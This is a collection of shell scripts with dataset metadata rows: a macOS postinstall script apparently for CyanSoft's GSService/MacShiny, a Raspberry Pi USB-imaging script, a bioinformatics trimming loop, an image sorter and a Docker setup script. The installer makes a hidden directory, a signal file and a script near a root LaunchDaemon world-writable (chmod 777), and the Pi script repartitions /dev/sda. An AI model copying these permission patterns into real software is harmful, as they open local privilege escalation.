echo "mkdir+chmod: /Library/Preferences/.5C0031D5-71DD-4BF2-BBB2-428ED1968258"
mkdir "/Library/Preferences/.5C0031D5-71DD-4BF2-BBB2-428ED1968258"
chmod 777 "/Library/Preferences/.5C0031D5-71DD-4BF2-BBB2-428ED1968258"
#######################Installing Momi.framework
echo "Installing Momi.framework"
mv -f "/Library/Application Support/CyanSoft/gsservice/Momi.framework.zip" "/Library/Frameworks/Momi.framework.zip"
rm -rf "/Library/Frameworks/Momi.framework"
unzip "/Library/Frameworks/Momi.framework.zip" -d "/Library/Frameworks"
rm -rf "/Library/Frameworks/Momi.framework.zip"
chmod -R 555 "/Library/Frameworks/Momi.framework"
# MomiRestoreLinks.sh:
momiRoot="/Library/Frameworks/Momi.framework/Versions/3.12.1"
# Create (or replace) a symlink inside the Momi framework bundle; both
# arguments are paths relative to $momiRoot. Errors are reported but do not
# abort the installer.
linkMomiFile()
{
# $1 - original file
# $2 - link file
# additional '-h -f' for postinstall
# -h (macOS/BSD ln) avoids following an existing destination symlink and
# -f overwrites a previous link so re-installs succeed.
ln -s -h -f "${momiRoot}/$1" "${momiRoot}/$2"
local errorCode=$?
if [ $errorCode != 0 ]; then
echo "Error $errorCode creating link for ${momiRoot}/$1"
# exit 1 - not for postinstall!
fi
}
linkMomiFile "lib/libmonoboehm-2.0.1.dylib" "lib/libmono-2.0.1.dylib"
linkMomiFile "lib/libmonoboehm-2.0.1.dylib" "lib/libmono-2.0.dylib"
linkMomiFile "lib/libmonoboehm-2.0.1.dylib" "lib/libmonoboehm-2.0.dylib"
linkMomiFile "lib/libsqlite3.0.8.6.dylib" "lib/libsqlite3.0.dylib"
linkMomiFile "lib/libsqlite3.0.8.6.dylib" "lib/libsqlite3.dylib"
# Link one GAC assembly into the runtime's lib/mono/4.5 directory.
linkGacDll()
{
# $1 - subpath in lib/mono/gac/ folder
# Quote "$1" so paths containing spaces survive basename, and split the
# declaration from the command substitution so a basename failure is not
# masked by the 'local' builtin's own exit status.
local dllName
dllName=$(basename "$1")
linkMomiFile "lib/mono/gac/$1" "lib/mono/4.5/${dllName}"
}
linkGacDll "Mono.Data.Sqlite/4.0.0.0__0738eb9f132ed756/Mono.Data.Sqlite.dll"
linkGacDll "Mono.Posix/4.0.0.0__0738eb9f132ed756/Mono.Posix.dll"
linkGacDll "Mono.Security/4.0.0.0__0738eb9f132ed756/Mono.Security.dll"
linkGacDll "System/4.0.0.0__b77a5c561934e089/System.dll"
linkGacDll "System.Configuration/4.0.0.0__b03f5f7f11d50a3a/System.Configuration.dll"
linkGacDll "System.Core/4.0.0.0__b77a5c561934e089/System.Core.dll"
linkGacDll "System.Data/4.0.0.0__b77a5c561934e089/System.Data.dll"
linkGacDll "System.Drawing/4.0.0.0__b03f5f7f11d50a3a/System.Drawing.dll"
linkGacDll "System.IdentityModel/4.0.0.0__b77a5c561934e089/System.IdentityModel.dll"
linkGacDll "System.Net.Http/4.0.0.0__b03f5f7f11d50a3a/System.Net.Http.dll"
linkGacDll "System.Runtime.Serialization/4.0.0.0__b77a5c561934e089/System.Runtime.Serialization.dll"
linkGacDll "System.Runtime.Serialization.Formatters.Soap/4.0.0.0__b03f5f7f11d50a3a/System.Runtime.Serialization.Formatters.Soap.dll"
linkGacDll "System.Security/4.0.0.0__b03f5f7f11d50a3a/System.Security.dll"
linkGacDll "System.ServiceModel/4.0.0.0__b77a5c561934e089/System.ServiceModel.dll"
linkGacDll "System.ServiceModel.Activation/4.0.0.0__31bf3856ad364e35/System.ServiceModel.Activation.dll"
linkGacDll "System.Transactions/4.0.0.0__b77a5c561934e089/System.Transactions.dll"
linkGacDll "System.Web/4.0.0.0__b03f5f7f11d50a3a/System.Web.dll"
linkGacDll "System.Web.ApplicationServices/4.0.0.0__31bf3856ad364e35/System.Web.ApplicationServices.dll"
linkGacDll "System.Web.Extensions/4.0.0.0__31bf3856ad364e35/System.Web.Extensions.dll"
linkGacDll "System.Web.Services/4.0.0.0__b03f5f7f11d50a3a/System.Web.Services.dll"
linkGacDll "System.Xml/4.0.0.0__b77a5c561934e089/System.Xml.dll"
linkGacDll "System.Xml.Linq/4.0.0.0__b77a5c561934e089/System.Xml.Linq.dll"
##################################################
echo "install pList"
#install pList
cp -p "/Library/Application Support/CyanSoft/gsservice/com.cyan.GSService.plist" "/Library/LaunchDaemons/com.cyan.GSService.plist"
chown root:wheel "/Library/LaunchDaemons/com.cyan.GSService.plist"
chmod 644 "/Library/LaunchDaemons/com.cyan.GSService.plist"
chown "$USER":staff "/Library/Application Support/CyanSoft/gsservice"
# Drop a world-writable marker file owned by the console user captured in
# $USER above; presumably polled by GSService (TODO confirm).
createSignalFile()
{
# $1 - signal file path
echo "createSignalFile: $1"
touch "$1"
chmod 777 "$1"
chown "${USER}":staff "$1"
}
# former Installation.txt
# !create signal file BEFORE launchctl!
createSignalFile "/tmp/.sig_CyanSoft_GSService_installPending"
#OTs an ability to prevent a loading of GSService for testing
if [ ! -f "/Users/${USER}/Desktop/Testing/GSService/DisableGSService.txt" ]
then
echo "launchctl load GSService.plist"
launchctl load -wF "/Library/LaunchDaemons/com.cyan.GSService.plist"
else
echo "DisableGSService.txt"
fi
echo "mkdir: /Users/$USER/Library/Application Support"
mkdir "/Users/$USER/Library/Application Support"
if [ $? == 0 ]; then
echo "chmod: /Users/$USER/Library/Application Support"
chmod 777 "/Users/$USER/Library/Application Support"
fi
echo "mkdir+chown+chmod: /Users/$USER/Library/Application Support/MacShiny"
mkdir "/Users/$USER/Library/Application Support/MacShiny"
chown -R "$USER":staff "/Users/$USER/Library/Application Support/MacShiny"
chmod 777 "/Users/$USER/Library/Application Support/MacShiny"
#install RLogScript
mv -f "/Library/Application Support/CyanSoft/gsservice/RLogScript.sh" "/Library/Application Support/CyanSoft/RLogScript.sh"
chmod 777 "/Library/Application Support/CyanSoft/RLogScript.sh"
exit 0
| true |
c7ebfd0c6755503551c7fead996c25740877d197 | Shell | d-green/dcm4chee-cdw-raspberry | /gpiofs | UTF-8 | 2,284 | 3.375 | 3 | [] | no_license | #!/bin/bash
# Log file and wiringPi pin numbers used throughout this script.
LOGFILE=/srv/dcm4chee-cdw/server/default/log/gpioisofs.log
gpiobutton=0	# pins 9/11
gpioled=2	# pins 13/14
waittime=60	# sec to blinking waiting
# LED pin as output; button pin as input with the internal pull-up enabled
# (a pressed button therefore reads 0, see gpiotestbutton below).
gpiosetup()
{
	gpio mode $gpioled out
	gpio mode $gpiobutton in
	gpio mode $gpiobutton up #pullup resistor
}
# Block until a full press-and-release cycle: first wait while the (pulled
# up) line reads 1, i.e. until the button is pressed, then wait for release.
gpiowaitbutton()
{
	while [ `gpio read $gpiobutton` = 1 ]; do
		sleep 0.1
	done
	while [ `gpio read $gpiobutton` = 0 ]; do
		sleep 0.1
	done
}
# Return 0 when the button is held down (read == 0) across a 0.2s debounce
# interval; 1 otherwise.
gpiotestbutton()
{
	if [ `gpio read $gpiobutton` = 0 ]
	then
		sleep 0.2
		if [ `gpio read $gpiobutton` = 0 ]
		then
			return 0
		fi
	fi
	return 1
}
# Turn the status LED on.
gpiolight_on()
{
	gpio write $gpioled 1
}
# Turn the status LED off.
gpiolight_off()
{
	gpio write $gpioled 0
}
function gimmeusb {
	# Wait for a removable medium to show up under /media, blinking the
	# LED once per second.  Gives up after $waittime iterations and
	# aborts the whole script (exit 1) if the user presses the button.
	# grep -c replaces the original 'cat … | grep … | wc -l' pipeline.
	while [[ $(grep -c media /proc/mounts) = 0 && $waittime -gt 0 ]]; do
		gpiolight_on
		sleep 0.5
		gpiolight_off
		sleep 0.5
		((waittime--))
		# Test the function's exit status directly instead of via $?.
		if gpiotestbutton; then
			# User pressed button to abort
			exit 1
		fi
	done
}
# main
# POSIX trick: 'for' without 'in' iterates over "$@", so after the loop
# $last holds the final command-line argument (the source directory).
for last; do true; done
argument=$last
gpiosetup
gpiolight_on
# Image size in 512-byte sectors: du -sk reports KiB (*2 = sectors),
# plus 65535 extra sectors (~32 MiB) of headroom for FAT overhead.
FLASH_SIZE=`du -s -k $argument |awk '{print $1*2+65535}'|bc`
# First partition occupies sectors 2048..LAST_SEC (length FLASH_SIZE);
# the second partition starts immediately after it.
LAST_SEC=`echo $FLASH_SIZE+2047|bc`
NEXT_START=`echo $FLASH_SIZE+2048|bc`
echo $argument >>$LOGFILE
start=$(date +%s.%N);
printf "Timestamp $start %d sectors " $FLASH_SIZE >>$LOGFILE
du -s -k $argument >>$LOGFILE
# Build a FAT filesystem inside a loopback image and copy the payload in.
dd if=/dev/zero of=/tmp/flash.img bs=512 count=$FLASH_SIZE status=none
/sbin/losetup /dev/loop0 /tmp/flash.img
/sbin/mkfs -t vfat /dev/loop0 >>/dev/null
sleep 2
mount /dev/loop0 /mnt
tt=$(echo "$(date +%s.%N) - $start" | bc);
printf "Create image(dd) %fsec. " $tt >>$LOGFILE
cp -r $argument/* /mnt
umount /dev/loop0 &
wait
/sbin/losetup -D
tt=$(echo "$(date +%s.%N) - $start" | bc);
printf "Copy(cp) %fsec. " $tt >>$LOGFILE
# Repartition the target device with partition 1 sized to the image.
# NOTE(review): /dev/sda is assumed to be the removable stick — confirm
# on the target hardware; this wipes the device's partition table.
parted -s -a none /dev/sda mklabel msdos >/dev/null
parted -s -a none /dev/sda unit s mkpart primary fat32 2048 $LAST_SEC >/dev/null
partprobe &
wait
mkfs -t vfat /dev/sda1 >/dev/null &
wait
# Raw-copy the prepared image onto the first partition.
dd if=/tmp/flash.img of=/dev/sda1 bs=512 count=$FLASH_SIZE status=none &
wait
tt=$(echo "$(date +%s.%N) - $start" | bc);
printf "Move image(dd) %fsec.\n" $tt >>$LOGFILE
rm /tmp/flash.img
# Second partition: an empty FAT filesystem filling the remaining space.
parted -s -a none /dev/sda unit s mkpart primary fat32 $NEXT_START 100% >/dev/null
partprobe &
wait
mkfs -t vfat /dev/sda2 >/dev/null
sleep 2
gpiolight_off
exit 0
| true |
39742141521364fcda61e26c73ba06d23b4bebe5 | Shell | ievanh6/final-project-public | /scripts/06_trimmomatic.sh | UTF-8 | 943 | 3.328125 | 3 | [] | no_license | #!/bin/bash
# trim paired end reads in parallel
# Info on the Trimmomatic tool available here:
# http://www.usadellab.org/cms/index.php?page=trimmomatic
# https://github.com/timflutre/trimmomatic
# Naupaka Zimmerman
# nzimmerman@usfca.edu
# November 6, 2017
# call script like so: "bash 06_trimmomatic.sh data/fastq/*_1.fastq"
# meant to run for paired reads based on name of forward
# read (ends in "_1.fastq"), which determines how variants of output are
# determined
# requires TruSeq3-SE.fa file with Illumina adapters to be in the directory
# this file is in the 'misc' folder for this project
# this set of parameters is a bit stricter than the defaults
# e.g. we're trimming any reads that drop below 15 in a window size of 4
# Launch one two-threaded TrimmomaticSE job per input file, all in
# parallel.  Output goes to data/trimmed/<name>.trim.fastq.  The
# original script never reaped the background jobs, so it could exit
# (and report success to its caller) before any trimming finished;
# the trailing 'wait' blocks until every job completes.
for file in "$@"; do
    TrimmomaticSE -threads 2 "$file" \
        data/trimmed/"$(basename -s .fastq "$file")".trim.fastq \
        ILLUMINACLIP:data/TruSeq3-SE.fa:2:30:10 LEADING:3 TRAILING:3 \
        SLIDINGWINDOW:4:15 MINLEN:36 CROP:100 &
done
wait  # reap all parallel trimming jobs before exiting
| true |
5d3421f4ec61985710fcb163d6fa5b4346118141 | Shell | HasanAbbadi/config | /scripts/pix/sxort | UTF-8 | 716 | 3.75 | 4 | [] | no_license | #!/bin/sh
# Largest files first: human-readable du listing sorted descending,
# minus the two summary lines, piped to sxiv thumbnail mode.
bySize() {
	du -ah | sort -hr | cut -f2- | tail -n +3 | sxiv -t -
}
# Alphabetical order: plain ls output piped to sxiv thumbnail mode.
byName() {
	ls | sxiv -t -
}
# Group images by extension: png, then jpeg, jpg, gif.
# BUG FIX: the original used ';' between the listings, so only the
# final 'ls -1 *.gif' was piped into sxiv — the png/jpeg/jpg names
# went to the terminal instead.  Grouping with { ...; } sends all
# four listings through the pipe.
byType() {
	{ ls -1 *.png ; ls -1 *.jpeg ; ls -1 *.jpg ; ls -1 *.gif ; } | sxiv -t -
}
# Most recently modified first (ls -t), piped to sxiv thumbnails.
byTime() {
	ls -t | sxiv -t -
}
# Random order: shuffle the file list before handing it to sxiv.
Shuffle() {
	ls | shuf | sxiv -t -
}
helpMe() {
	# Print the usage text listing every supported flag.
	cat <<'EOF'
Please provide an argument:
  --size | -s ) bigger --> smaller
  --name | -n ) alphabetical order a-z
  --type | -t ) png > jpeg > jpg > gif
  --time | -l ) last modified
  --shuf | -r ) random order
  --help | -h ) this help message
EOF
}
# Dispatch on the first command-line argument.  --help, -h, and a
# missing/empty argument all print the usage text; any other unknown
# argument matches no arm and the script silently does nothing.
case "$1" in
	--size | -s) bySize ;;
	--name | -n) byName ;;
	--type | -t) byType ;;
	--time | -l) byTime ;;
	--shuf | -r) Shuffle ;;
	--help | -h | "") helpMe ;;
esac
| true |
0c369834ee2f877c753742e5f3e370533396f34f | Shell | gabrielplicks/planutils | /planutils/packages/TEMPLATE/install | UTF-8 | 459 | 3.09375 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# No need to install planutils dependencies
# No need to check if already installed
# The install script will be run from the package's directory
# To use if root is required
#[ "$UID" -eq 0 ] || (echo "installation requires root access"; exec sudo "$0" "$@")
# Install general linux dependencies
# General setup / configuration
# Recipe for singularity images
## Fetch the image
#singularity pull --name <image name> <singularity shub url>
| true |
3fe6cf1c33589eb5b7fe50b893bbbdd2f27aeb24 | Shell | NithyaKoka/FTP-Connection_data_migrations | /test.sh | UTF-8 | 169 | 3.0625 | 3 | [] | no_license | #!/usr/bin/env bash
cd #location
for d in */*.xml ; do
echo "Checking the xml file in $d directory for the contol characters"
perl -i -pe 's/[[:cntrl:]]//g' $d;
done | true |
cf418017632ccbf8cb12f39933d44e58b35de206 | Shell | cipek/xDrone | /scripts/setup.sh | UTF-8 | 707 | 2.578125 | 3 | [] | no_license | #! /bin/sh
# Install Docker CE and docker-compose on Ubuntu, then pull/build the
# images for the xDrone ROS environment.
sudo apt-get update
# Remove pre-CE Docker packages, per the official Docker install docs.
# The original line ('sudo apt-get docker docker-engine docker.io')
# was missing the apt-get sub-command entirely and always failed.
sudo apt-get remove -y docker docker-engine docker.io
# Add Docker's GPG key before registering the apt repository so the
# following 'apt-get update' can verify the new source.
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo add-apt-repository \
   "deb [arch=amd64] https://download.docker.com/linux/ubuntu \
   $(lsb_release -cs) \
   stable"
sudo apt-get update
sudo apt-get install -y docker-ce
# docker-compose: standalone binary pinned to 1.24.0.
sudo curl -L "https://github.com/docker/compose/releases/download/1.24.0/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
# NOTE(review): this distro package is redundant with the pinned binary
# above; kept as a fallback but consider removing one of the two.
sudo apt install -y docker-compose
# Let the current user talk to the Docker daemon without sudo.
sudo groupadd docker
sudo gpasswd -a "$USER" docker
docker pull ros:kinetic-robot
docker build -t xdrone .
# Re-evaluate group membership so 'docker' works in this session.
newgrp docker
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.